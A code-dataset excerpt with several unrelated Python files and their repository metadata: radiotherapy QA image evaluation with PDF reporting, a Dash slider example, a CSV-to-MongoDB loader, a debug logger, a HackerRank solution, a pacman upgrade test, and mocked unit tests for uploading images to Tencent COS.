"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"_chart" : {"width" : 90, "height" : 50},
"_imgSize" : {"width" : 120, "height" : 120},
"_image_attrs" : { "margin-top": "5mm" },
"field" : { "X1":-110, "X2": 110, "Y1": -110, "Y2": 110 },
"evaluation_table_pdf" : {
"fields": [
{'field': 'name', 'label':'von - nach' },
{'field': 'value', 'label':'Wert', 'format':'{0:.3f}' },
{'field': 'value_passed', 'label':'Passed' }
],
"area": {"left" : 125, "top" : 165, "width": 50},
"attrs": {"class":"layout-fill-width"},
},
"evaluation_replaces" : {"value":"Wert"},
"tolerance_pdf": {
"area" : { "left" : 10, "top" : 240, "width": 180},
"mode" : "text"
},
"tolerance_field": "value"
} ), self.metadata )
#print("doJT_10_3-current", md.current )
def evaluate( df_group ):
"""Evaluate grouped Fields.
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
sumfield = []
# alle Felder durchgehen
for (idx, info) in df_fields.iterrows():
checkField = qa_field( self.getFullData(info), normalize="none" )
if len(sumfield) == 0:
sumfield = checkField.image.array
else:
sumfield = np.add( sumfield, checkField.image.array )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# das baseField durch das normalisierte Summenfeld erstezen
baseField.image.array = np.divide( sumfield, baseField.image.array + 0.00000001 )
# baseField auswerten
data4q = baseField.find4Qdata()
evaluation_df = pd.DataFrame( data4q['result'] ).T
# alle vier Quadranten durchgeghen
for k, item in data4q["result"].items():
# plot des Quadranten
img = baseField.plot4Qprofile( item, metadata=md )
self.pdf.image(img, md["_chart"] )
#
# Bild mit Beschriftung anzeigen
#
def addToPlot( **args ):
self = args["self"]
ax = args["ax"]
# print( args["field"] )
da = self.getFieldDots( {
"X1": args["field"]["X1"] - 20,
"X2": args["field"]["X2"] + 20,
"Y1": args["field"]["Y1"] - 20,
"Y2": args["field"]["Y2"] + 20
} )
style = dict(size=40, color='green', ha='center', va='center', alpha=.9)
ax.text( da["X1"] , da["Y1"] , 'Q1', **style)
ax.text( da["X1"] , da["Y2"] , 'Q2', **style)
ax.text( da["X2"] , da["Y2"] , 'Q3', **style)
ax.text( da["X2"] , da["Y1"] , 'Q4', **style)
img = baseField.image.plotImage(
original=False
, invert=False
, plotTitle=False
, plotCax=False
, plotField=data4q["field"]
, field=md["field"]
, plotTicks=True
, metadata=md
, arg_function=addToPlot, arg_dict=data4q
)
self.pdf.image(img, md["_imgSize"], attrs=md["_image_attrs"] )
# print("doJT_10_3", md.current, evaluation_df )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, md["tolerance_field"] )
#
# Sortiert nach check_subtag
# Gruppiert nach Tag und SeriesNumber abarbeiten
#
( fileData
.sort_values( md["series_sort_values"], na_position='first')
.groupby( md[ "series_groupby" ] )
.apply( evaluate )
)
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doMT_VMAT_0_1( self, fileData ):
"""PicketFence DMLC Dosimetrie eines 40x100 großen Feldes
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
result=[]
# wird für progress verwendet
filesMax=len( fileData )
self.fileCount = 0
# metadata ergänzen und lokal als md bereitstellen
md = dict_merge( DotMap( {
"series_sort_values": ["MLCPlanType", "gantry"],
"series_groupby": ["day", "SeriesNumber"],
"current": {
"field_count": self.metadata.current.get("fields", 0) - 1, # 4
},
"querys" : {
"base" : 'MLCPlanType!="DynMLCPlan"', # "check_subtag == 'base'",
"fields" : 'MLCPlanType=="DynMLCPlan"', # "check_subtag != 'base'",
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"doseArea" : { "X1":-0.75, "X2": 0.75, "Y1": -4, "Y2": 4 },
"_imgSize" : {"width" : 36, "height" : 70},
"_imgField": {"border": 10 },
"_chart": { "width" : 180, "height" : 60},
"table_fields" : [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
# {'field': 'Mof', 'label':'M<sub>OF</sub>', 'format':'{0:.5f}' },
{'field': 'Mcorr', 'label':'M<sub>corr</sub>', 'format':'{0:.4f}' },
{'field': 'Mdev', 'label':'M<sub>dev</sub> [%]', 'format':'{0:.2f}' },
{'field': 'Mdev_passed', 'label':'Passed' },
]
} ), self.metadata )
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe.
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
Mof = baseField.image.getRoi( md["doseArea"] ).copy()
data = [{
'Kennung': baseField.infos["Kennung"],
'gantry': baseField.infos["gantry"],
'Mcorr': np.nan,
'Mdev': np.nan,
'Passed' : np.nan
}]
img = baseField.image.plotImage( original=False
, field = md["_imgField"]
, metadata = md
, plotTitle = "{Kennung}"
, invert=False, plotCax=False, plotField=True )
# Bild anzeigen
self.pdf.image( img, md["_imgSize"] )
# alle felder durchgehen
for info in df_fields.itertuples():
field = qa_field( self.getFullData( info ) )
#Mdmlc = field.getMeanDose( md["doseArea"] )
Mdmlc = field.image.getRoi( md["doseArea"] ).copy()
Mcorr = (Mdmlc / Mof).mean()
data.append( {
'Kennung': field.infos["Kennung"],
'gantry': field.infos["gantry"],
'Mcorr': Mcorr,
'Mdev': np.nan,
'Pass' : np.nan
} )
img = field.image.plotImage( original=False
, field = md["_imgField"]
, metadata = md
, plotTitle = "{Kennung}"
, invert=False, plotCax=False, plotField=True )
# Bild anzeigen
self.pdf.image( img, md["_imgSize"] )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
df = pd.DataFrame( data )
McorrMean = df['Mcorr'].mean( )
df[ 'Mdev' ] = (df[ 'Mcorr' ] - McorrMean ) / McorrMean * 100
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'Mdev', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check )
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
# Formel
self.pdf.mathtext( r"Berechnung des Flatness-korrigierten Bildes: $M_{corr,i}(x,y) = \frac{M_{DMLC,i}(x,y)}{M_{OF}(x,y)}$", attrs={ "margin-top": "5mm" } )
self.pdf.mathtext( r"Dosimetrische Abweichung aus den ROI-Mittelwerten: $M_{dev,i} = \frac{\overline{M_{corr,i}}-\overline{M_{corr}}}{\overline{M_{corr}}}$", attrs={ "margin-top": "5mm" } )
#
# Tabelle erzeugen
#
self.pdf.pandas( df,
attrs={"class":"layout-fill-width", "margin-top": "5mm"},
fields=md["table_fields"]
)
text_values = {
"f_warning": md.current.tolerance.default.warning.get("f",""),
"f_error": md.current.tolerance.default.error.get("f","")
}
text = """<br>
Warnung bei: <b style="position:absolute;left:45mm;">{f_warning}</b><br>
Fehler bei: <b style="position:absolute;left:45mm;">{f_error}</b>
""".format( **text_values ).replace("{value}", "M<sub>dev</sub>")
self.pdf.text( text )
# Gesamt check
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach SeriesNumber abarbeiten
#
fileData.sort_values(["MLCPlanType", "gantry"], na_position='first').groupby( [ 'day', 'SeriesNumber' ] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doMT_8_02_5(self, fileData ):
"""
Die jeweilig gleichen Gantry und Kolliwinkel übereinanderlegen und mit dem offenem Feld vergleichen
# Anzahl der Felder gesamt - MLCPlanType nicht None
count_0 = len(df) - df["MLCPlanType"].count()
count_other = len( df ) - count_0
if count_0 != 1 and count_other != 4:
print( "Falsche Anzahl der Felder offen:{} other:{}".format( count_0, count_other) )
return
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width"},
},
"_imgSize" : {"width" : 45, "height" : 45},
"fieldArea" : { "X1":-80, "X2":80, "Y1": -80, "Y2":80, "xStep":20, "yStep":20 },
"doseArea" : { "X1": -60, "X2": 60, "Y1": -60, "Y2": 60 },
"table_fields": [
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
{'field': 'collimator', 'label':'Kollimator', 'format':'{0:1.1f}' },
{'field': 'basedose', 'label':'Ref. Dosis', 'format':'{0:1.4f}' },
{'field': 'fielddose', 'label':'Feld Dosis', 'format':'{0:1.4f}' },
{'field': 'diff', 'label':'Diff [%]', 'format':'{0:1.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
]
} ), self.metadata )
# für jeden datensatz
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe
"""
# das Datum vom ersten Datensatz verwenden
checkDate = df_group['AcquisitionDateTime'].iloc[0].strftime("%d.%m.%Y")
self.pdf.setContentName( checkDate )
#
# Anleitung
#
self.pdf.textFile( **md.manual )
#print( df.query("CollMode == 'Symmetry'") )
# es muss ein symetrisches basis Feld geben
df_sym = df_group.query("CollMode == 'Symmetry'")
if len(df_sym) != 1:
result.append( self.pdf_error_result(
md, date=checkDate, group_len=len( result ),
msg='<b>Datenfehler</b>: keine Felder gefunden oder das offene Feld fehlt.'
) )
return
# base Field bereitstellen
baseField = qa_field( self.getFullData( df_sym.loc[df_sym.index[0]] ) )
# progress
self.fileCount += 1
# dosis ermitteln
baseDose = baseField.getMeanDose( md["doseArea"] )
data = []
def joinImages( jdf ):
# für beide Bilder
if len(jdf) != 2:
return
# die felder bereitstellen
field = []
for index, row in jdf.iterrows():
field.append( qa_field( self.getFullData( row ) ) )
# die image daten des ersten feldes mit der Summe beider überschreiben
field[0].image.array = np.add( field[0].image.array, field[1].image.array )
# das Summenfeld ausgeben
img = field[0].image.plotImage( original=False
, metadata=md
, field = md["fieldArea"]
, plotTitle="G:{gantry:01.1f} K:{collimator:01.1f}"
, cmap='twilight'
#, cmap='gray_r'
, invert=False, plotCax=True, plotField=False )
self.pdf.image( img, md["_imgSize"], attrs={"margin-top": "5mm"} )
# die sumendosis ermitteln
fieldDose = field[0].getMeanDose( md["doseArea"] )
# Ergebnisse merken
data.append( {
"gantry" : field[0].infos["gantry"],
"collimator" : field[0].infos["collimator"],
"basedose": baseDose,
"fielddose": fieldDose,
"diff": (fieldDose-baseDose) / baseDose * 100
} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
# progress hier immer 2 Felder
self.fileCount += 2
#print( md["variante"], filesMax, self.fileCount, 50 + ( 50 / filesMax * self.fileCount ) )
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# Gruppiert nach Gantry und Kollimator auswerten
( df_group
.query( "CollMode == 'AsymmetryX'" )
.groupby( [ 'gantry', 'collimator' ] )
.apply( joinImages )
)
# das Ergebnis verarbeiten
df = pd.DataFrame( data )
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'diff', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check )
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
#
# result Tabelle erzeugen
#
self.pdf.pandas( df,
attrs={"class":"layout-fill-width", "margin-top": "5mm"}
, fields=md["table_fields"]
)
# toleranz anzeigen
text_values = {
"f_warning": md.current.tolerance.default.warning.get("f",""),
"f_error": md.current.tolerance.default.error.get("f","")
}
text = """<br>
Warnung bei: <b style="position:absolute;left:25mm;">{f_warning}</b><br>
Fehler bei: <b style="position:absolute;left:25mm;">{f_error}</b>
""".format( **text_values ).replace("{value}", "Diff")
self.pdf.text( text )
# Gesamt check - das schlechteste aus der tabelle
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach Tag und SeriesNumber abarbeiten
#
( fileData
.sort_values(by=[ "gantry", "collimator", "CollMode", "AcquisitionDateTime"])
.groupby( [ 'day', 'SeriesNumber' ] )
.apply( groupBySeries )
)
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
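# A minimal numeric sketch of the IEC flatness formula used in
# qa_field.getProfileData(): flatness = (D_max - D_min) / D_CAX * 100, evaluated over
# the central 80% of the field width. The profile values below are made-up sample data.
if __name__ == "__main__":
    _profile = np.array([0.0, 0.97, 0.99, 1.00, 0.99, 0.98, 0.0])
    _d_max, _d_min, _d_cax = _profile[1:-1].max(), _profile[1:-1].min(), _profile[3]
    print("flatness [%]: {:.2f}".format((_d_max - _d_min) / _d_cax * 100))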
| 37.146108 | 209 | 0.500709 |
2e81440dd46d0cd50a514576859b4698c9217588
| 431 |
py
|
Python
|
examples/simple_slider.py
|
xinetzone/dash-tests
|
cd4526caa2f9d906915c31370b3487bdcef92aa4
|
[
"Apache-2.0"
] | 1 |
2022-03-01T07:38:32.000Z
|
2022-03-01T07:38:32.000Z
|
examples/simple_slider.py
|
xinetzone/dash-tests
|
cd4526caa2f9d906915c31370b3487bdcef92aa4
|
[
"Apache-2.0"
] | 12 |
2021-07-13T12:33:36.000Z
|
2021-07-14T05:25:19.000Z
|
examples/simple_slider.py
|
xinetzone/dash-book
|
1f624e87e2aa02c9931318918df969e44bdd2c07
|
[
"Apache-2.0"
] | null | null | null |
from dash import dcc, html
from dash.dependencies import Input, Output
from app import app
layout = html.Div([
dcc.Slider(
id='my-slider',
min=0,
max=20,
step=0.5,
value=10,
),
html.Div(id='slider-output-container')
])
@app.callback(
Output('slider-output-container', 'children'),
[Input('my-slider', 'value')])
def update_output(value):
return f'你选择了 "{value}"'
| 18.73913 | 50 | 0.600928 |
d84a679d8e874a13fb60c7fa45f4303f7f11d004
| 2,012 |
py
|
Python
|
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
getarq.py
|
neviim/gt6db
|
f30d741f7722c4a086fbeaaf1995eeb61d63612e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import os
import csv
import json
import pymongo
from pymongo import MongoClient
# mongodb
def get_db():
client = MongoClient('localhost:27017')
db = client.gt6db
return db
def add_dados(db, data):
db.countries.insert(data)
def get_country(db):
return db.countries.find_one()
# ---
def readMyFiles(filePath):
    # open the gt6db database
db = get_db()
#get all files in the given folder
fileListing = os.listdir(filePath)
for myFile in fileListing:
#create the file path
myFilePath = os.path.join(filePath, myFile)
        #check to make sure it's a file, not a sub folder
if (os.path.isfile(myFilePath) and myFilePath.endswith(".csv")):
            # csv reader variant (kept commented out below)
# with open(myFilePath, 'r', encoding='utf-8') as csvfile:
# #sniff to find the format
# fileDialect = csv.Sniffer().sniff(csvfile.read(1024))
# csvfile.seek(0)
# #create a CSV reader
# myReader = csv.reader(csvfile, dialect=fileDialect)
# #read each row
# for row in myReader:
# #do your processing here
# #print(row)
# pass
dados = {}
            # read the csv rows and insert them into MongoDB
with open(myFilePath, 'r', encoding='utf-8') as csvfile:
                #sniff to find the csv format
fileDialect = csv.Sniffer().sniff(csvfile.read(1024))
csvfile.seek(0)
#read the CSV file into a dictionary
dictReader = csv.DictReader(csvfile, dialect=fileDialect)
for row in dictReader:
#print(row)
db.base.insert(row)
return
if __name__ == '__main__':
currentPath = os.path.dirname(__file__)
filePath = os.path.abspath(os.path.join(currentPath, os.pardir,os.pardir,'_github/gt6/csv'))
readMyFiles(filePath)
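# A minimal sketch of reading back the documents that readMyFiles() inserts into the
# "base" collection, assuming a MongoDB instance is reachable on localhost:27017.
def _demo_read_back(limit=5):
    """Illustrative helper only: returns up to `limit` documents from gt6db.base."""
    db = get_db()
    return list(db.base.find().limit(limit))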
| 28.338028 | 96 | 0.567097 |
d8e1a1fa2188a997b036d4bbc5e9a957ed8233a4
| 860 |
py
|
Python
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 39 |
2019-02-23T07:55:43.000Z
|
2021-05-25T12:39:54.000Z
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 3 |
2019-07-29T08:11:25.000Z
|
2021-03-23T05:22:29.000Z
|
graph_network/util/debug_logger.py
|
stevezheng23/graph_network_tf
|
b48a43453c2731f253bfe5a61e0b6339f4fc9f99
|
[
"Apache-2.0"
] | 7 |
2019-03-17T02:30:45.000Z
|
2020-03-03T22:11:06.000Z
|
import codecs
import os.path
import time
import numpy as np
import tensorflow as tf
__all__ = ["DebugLogger"]
class DebugLogger(object):
"""debug logger"""
def __init__(self,
output_dir):
"""initialize debug logger"""
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
self.log_file = os.path.join(output_dir, "debug_{0}.log".format(time.time()))
self.log_writer = codecs.getwriter("utf-8")(tf.gfile.GFile(self.log_file, mode="a"))
def log_print(self,
message):
"""log and print debugging message"""
time_stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
log_line = "{0}: {1}".format(time_stamp, message).encode('utf-8')
self.log_writer.write("{0}\r\n".format(log_line))
print(log_line)
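# A minimal usage sketch, assuming the chosen output directory is writable; DebugLogger
# creates it if necessary and appends timestamped lines to a debug_<timestamp>.log file.
if __name__ == "__main__":
    demo_logger = DebugLogger("debug_logs")
    demo_logger.log_print("debug logger smoke test")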
| 31.851852 | 92 | 0.601163 |
9917ac0d082d36b23fe420d60e5928b9a417ba5f
| 607 |
py
|
Python
|
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/Strange_Counter.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
# https://www.hackerrank.com/challenges/strange-code/problem?utm_campaign=challenge-recommendation&utm_medium=email&utm_source=24-hour-campaign
starting = 3
index = 1
# start time and start value of each counter cycle, built in parallel
time,value = [],[]
for i in range(1,40+1):
time.append(index) # time
value.append(starting) # value
index = starting+index
starting *= 2
cycle = list(zip(time,value))
# time at which the counter value is requested
t = 213921847123
# find the cycle whose start time is the largest one not greater than t
f = 0
for i in range(len(time)):
    if t < time[i]:
        f = (i - 1, time[i - 1])
        break
# counter value = start value of that cycle minus the time elapsed inside it
elapsed = t - f[1]
print(value[f[0]] - elapsed)
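# The same value can also be computed without pre-building the time/value lists:
# cycle k starts at time 1 + 3*(2**(k-1) - 1) with start value 3*2**(k-1), and the
# counter then decreases by one per time unit. A minimal sketch of that approach:
def strange_counter_value(query_time):
    """Illustrative alternative: counter value shown at query_time (>= 1), e.g. 6 at t=4."""
    start, val = 1, 3
    while query_time >= start + val:
        start += val
        val *= 2
    return val - (query_time - start)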
| 23.346154 | 143 | 0.655684 |
510562c861d3b8be08b435039d847a01d0c6f9e9
| 504 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade060.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade060.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade060.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Try to upgrade two packages which would break deps"
lp1 = pmpkg("pkg1")
lp1.depends = ["pkg2=1.0"]
self.addpkg2db("local", lp1)
lp2 = pmpkg("pkg2", "1.0-1")
self.addpkg2db("local", lp2)
p1 = pmpkg("pkg1", "1.1-1")
p1.depends = ["pkg2=1.0-1"]
self.addpkg(p1)
p2 = pmpkg("pkg2", "1.1-1")
self.addpkg(p2)
self.args = "-U %s" % " ".join([p.filename() for p in (p1, p2)])
self.addrule("PACMAN_RETCODE=1")
self.addrule("PKG_VERSION=pkg1|1.0-1")
self.addrule("PKG_VERSION=pkg2|1.0-1")
| 22.909091 | 71 | 0.64881 |
5a8d2479547a3e600faddf97ee8eb1ce9ec3ffd9
| 47,904 |
py
|
Python
|
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g4h2-graduation-project/src/backends/scf_functions/tests.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
import base64
import json
import logging
import unittest
from hashlib import md5
from io import BytesIO
from typing import Any, AnyStr, Dict, Tuple
from unittest import mock
from conf import settings
import handler_upload_img_to_cos
import handler_trigger_submit_img_to_ocr
import handler_submit_img_to_ocr
import handler_check_result
logger = logging.getLogger('unittest')
def check_cos_config(
test_case: unittest.TestCase,
mock_cos_config: mock.MagicMock,
call_count: int = -1,
case_id: str = None
):
"""检查 COS 配置是否正确
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if call_count >= 0:
test_case.assertEqual(call_count, mock_cos_config.call_count, f'{case_id_in_msg}CosConfig 初始化次数与预期不符')
for call_args in mock_cos_config.call_args_list:
test_case.assertEqual(0, len(call_args[0]), f'{case_id_in_msg}CosConfig 初始化时有预期外的位置参数')
test_case.assertEqual(
settings.QCLOUD_SECRET_ID,
call_args[1].get('SecretId'),
f'{case_id_in_msg}CosConfig 初始化时参数 SecretId 不符合预期'
)
test_case.assertEqual(
settings.QCLOUD_SECRET_KEY,
call_args[1].get('SecretKey'),
f'{case_id_in_msg}CosConfig 初始化时参数 SecretKey 不符合预期'
)
test_case.assertEqual(
settings.QCLOUD_REGION,
call_args[1].get('Region'),
f'{case_id_in_msg}CosConfig 初始化时参数 Region 不符合预期'
)
test_case.assertEqual(
'https',
call_args[1].get('Scheme'),
f'{case_id_in_msg}CosConfig 初始化时参数 Scheme 不符合预期'
)
        test_case.assertEqual(4, len(call_args[1]), f'{case_id_in_msg}CosConfig 初始化时有不符合预期数量的关键字参数')
def check_cos_client(
test_case: unittest.TestCase,
mock_cos_client: mock.MagicMock,
call_count: int = -1,
case_id: str = None
):
"""检查 COS 客户端是否配置正确
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
if call_count >= 0:
test_case.assertEqual(call_count, mock_cos_client.call_count, f'{case_id_in_msg}CosS3Client 初始化次数与预期不符')
for call_args in mock_cos_client.call_args_list:
test_case.assertEqual(1, len(call_args[0]), f'{case_id_in_msg}CosS3Client 初始化时有不符合预期数量的位置参数')
test_case.assertEqual(0, len(call_args[1]), f'{case_id_in_msg}CosS3Client 初始化时有预期之外的关键字参数')
test_case.assertEqual('config', call_args[0][0], f'{case_id_in_msg}CosS3Client 初始化时参数与预期不符')
class TestUploadImgToCos(unittest.TestCase):
@staticmethod
def open_img(path: str) -> Tuple[Dict[str, AnyStr], str]:
"""打开图像
"""
img_suffix = path.split('.')[-1] if len(path.split('.')) != 0 else None
if img_suffix in ('jpg', 'jpeg', 'JPG', 'JPEG'):
img_type = 'image/jpeg'
elif img_suffix in ('png', 'PNG'):
img_type = 'image/png'
else:
img_type = 'application/octet-stream'
with open(path, 'rb') as fp:
img = fp.read()
img_md5 = md5(img).hexdigest()
return {
'type': img_type,
'image': base64.b64encode(img).decode()
}, img_md5
def generate_test_event(self, img_path: str) -> Tuple[Dict[str, Any], str]:
"""生成测试用的 API 网关触发事件
"""
opened_img, img_md5 = self.open_img(img_path)
return {
'body': json.dumps(opened_img),
'headers': {'content-type': 'application/json'}
}, img_md5
def check_ret(self, ret, status_code: int = 200, case_id: str = None):
"""检查函数响应
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertIsInstance(ret, dict, f'{case_id_in_msg}主函数响应格式与预期不符')
self.assertEqual(status_code, ret.get('statusCode'), f'{case_id_in_msg}主函数响应状态码与预期不符')
self.assertFalse(ret.get('isBase64Encoded'), f'{case_id_in_msg}主函数响应 isBase64Encoded 字段与预期不符')
if status_code == 200:
self.assertEqual(
'application/json',
ret.get('headers', {}).get('Content-Type'),
f'{case_id_in_msg}主函数响应 Content-Type 与预期不符'
)
ret_body = json.loads(ret.get('body'))
img_id = ret_body.get('id')
self.assertRegex(
img_id,
r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
f'{case_id_in_msg}主函数响应图片 id 与预期不符'
)
result_url = ret_body.get('result')
self.assertEqual(
settings.RESULT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
result_url,
f'{case_id_in_msg}主函数响应图片 result 与预期不符'
)
img_direct_url = ret_body.get('img_direct_url')
self.assertEqual(
settings.IMG_DIRECT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
img_direct_url,
f'{case_id_in_msg}主函数响应图片 img_direct_url 与预期不符'
)
result_direct_url = ret_body.get('result_direct_url')
self.assertEqual(
settings.RESULT_DIRECT_URL_FORMATTER.format(f_id=img_id[0], id=img_id),
result_direct_url,
f'{case_id_in_msg}主函数响应图片 result_direct_url 与预期不符'
)
def check_cos_put_object(
self, client: mock.MagicMock,
img_id: str,
img_content_type: str,
img_md5: str,
case_id: str = None
):
"""检查 COS 对象是否按正确方式上传
"""
case_id_in_msg = f'[case {case_id}] ' if case_id else ''
self.assertEqual(
settings.COS_BUCKET,
client.put_object.call_args[1].get('Bucket'),
f'{case_id_in_msg}上传 COS 时 Bucket 参数与预期不符'
)
self.assertEqual(
f'{settings.IMAGES_ROOT}/{img_id}',
client.put_object.call_args[1].get('Key'),
f'{case_id_in_msg}上传 COS 时 Key 参数与预期不符'
)
self.assertEqual(
img_content_type,
client.put_object.call_args[1].get('ContentType'),
f'{case_id_in_msg}上传 COS 时 ContentType 参数与预期不符'
)
self.assertEqual(
img_md5,
md5(client.put_object.call_args[1].get('Body')).hexdigest(),
f'{case_id_in_msg}上传 COS 时 Body 参数与预期不符'
)
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_main_process(self, mock_cos_client, mock_cos_config):
"""测试主流程
测试用例:
1.1 test_data/test-img-normal-1.jpg 普通 JPEG 图片
1.2 test_data/test-img-normal-2.png 普通 PNG 图片
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
# 测试 JPEG 图片
event, img_md5 = self.generate_test_event('test_data/test-img-normal-1.jpg')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 200, '1.1')
img_id = json.loads(ret.get('body')).get('id')
self.check_cos_put_object(client, img_id, 'image/jpeg', img_md5, '1.1')
# 测试 PNG 图片
event, img_md5 = self.generate_test_event('test_data/test-img-normal-2.png')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 200, '1.2')
img_id = json.loads(ret.get('body')).get('id')
self.check_cos_put_object(client, img_id, 'image/png', img_md5, '1.2')
check_cos_config(self, mock_cos_config, 2, '1.x')
check_cos_client(self, mock_cos_client, 2, '1.x')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_img_too_big(self, mock_cos_client, mock_cos_config):
"""测试图片过大的情况
测试用例:
1.3 test_data/test-img-too-big-1.png 过大图片
"""
mock_cos_config.return_value = 'config'
client = mock_cos_client.return_value
event, img_md5 = self.generate_test_event('test_data/test-img-too-big-1.png')
ret = handler_upload_img_to_cos.main_handler(event, None)
self.check_ret(ret, 413, '1.3')
self.assertFalse(client.put_object.called, '[case 1.3] 向 COS 发送了过大的图片')
@mock.patch('handler_upload_img_to_cos.CosConfig')
@mock.patch('handler_upload_img_to_cos.CosS3Client')
def test_bad_request(self, mock_cos_client, mock_cos_config):
"""测试格式不合法的请求
测试用例: 1.4 - 1.10
"""
mock_cos_config.return_value = 'config'
